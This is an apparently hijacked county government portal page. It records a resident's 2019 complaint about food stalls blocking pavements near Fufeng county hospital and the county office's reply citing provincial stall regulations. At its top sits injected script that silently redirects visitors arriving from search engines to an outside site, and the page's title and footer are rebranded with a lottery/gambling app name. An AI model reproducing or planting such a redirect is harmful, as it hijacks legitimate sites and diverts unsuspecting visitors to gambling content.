萄京彩票app下载var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
您好!今天是:

当前位置: 政民互动
政民互动

信件内容

姓名: 王*
来信时间: 2019-12-09
是否公开: 公开
信件主题: 为了扶风县的卫生县城文明县城请书记来医院东边这街道看看
信件内容: 书记:你好!我前几天看到网上反映我们医院东边这条街道乱搭棚乱摆摊,尤其是北边这,十字路口北边就是大型垃圾箱,这边就是卖小吃的,五六家饭店都把人行道占光了,上次网上回复说这是便民销售点,你占道经营也要给行人留点路啊!再说了卖农产品可以,但是这都是流动的卖饮食的,又脏又乱,每天早晨学生都买这些三无食品你们能忍心吗?你们也派人来看看这里的现状吧,眉县也是文明县城,没有一条街道像这样脏乱的,这街道本来就太窄,人形道都占完了,学生老人都走下面太不安全了,如果你们再不管,我们就把这发到网上去了影响扶风县的形象了!


回复内容

受理时间: 2019-12-10
办理时间: 2019-12-14
办理部门: 县委办
办理状态: 已办结
办理情况:

网友您好,现回复如下:

《陕西省城市市容环境卫生条例》第二十六条第二款 城市道路、立交桥、过街桥、人行地下通道以及其他公共场所禁止摆摊设点。在不影响城市交通和市容环境卫生的情况下,市、县(区)人民政府可以确定特定路段、场地、时间准许设置临时零售点。《陕西省食品小作坊小餐饮及摊贩管理条例》第三十二条 县(市、区)城市管理综合行政执法部门或者市容环境卫生部门按照科学规划、合理布局、方便群众生活的原则,根据设区的市、县(市、区)人民政府确定的城市公共空间区域,统筹考虑交通、噪声、市容等因素,划定食品摊贩经营区域,确定经营时间,并向社会公布。

根据以上条例相关条款规定,结合县城新区综合市场较少已不能满足县城发展需要等因素,本着“以人为本、疏堵结合、有效管理、方便群众”的原则,既充分考虑摊贩的生计问题,又要维持良好的市容秩序,经认真调研,在不影响县城整体市容市貌的前提下,专门在西三路、兆兴商城西侧巷道、西一路(县医院东侧巷道)设置3处便民摊点,弥补了市场不足,为农民进城销售农产品提供了场所,也方便了市民群众。收到该网民留言后,县城市执法局执法人员对该路段便民销售摊点进行了集中整治,将人行道上的桌椅板凳、伞等物品全部拆除,整齐划一的统一摆放在人街道以下,同时要求各摊贩文明经营,严禁乱摆乱放、乱搭乱建、摆放整齐并保持周边卫生干净整洁。

县城市执法局将进一步加强便民销售摊点的日常管理,严格数量管控,保证有序摆放,确保便民销售摊点真正发挥作用,方便群众。




满意度测评

你对该回复是否满意?
满意 基本满意 不满意
手机号码: *
查询密码: *

网站地图

萄京彩票app下载主办:萄京彩票app下载办公室

Copyright © 2016 celeb6.com All Rights Reserved. 萄京彩票app下载门户网
陕ICP备12002704号    网站标识码:6103240002 联系我们:0917-5211328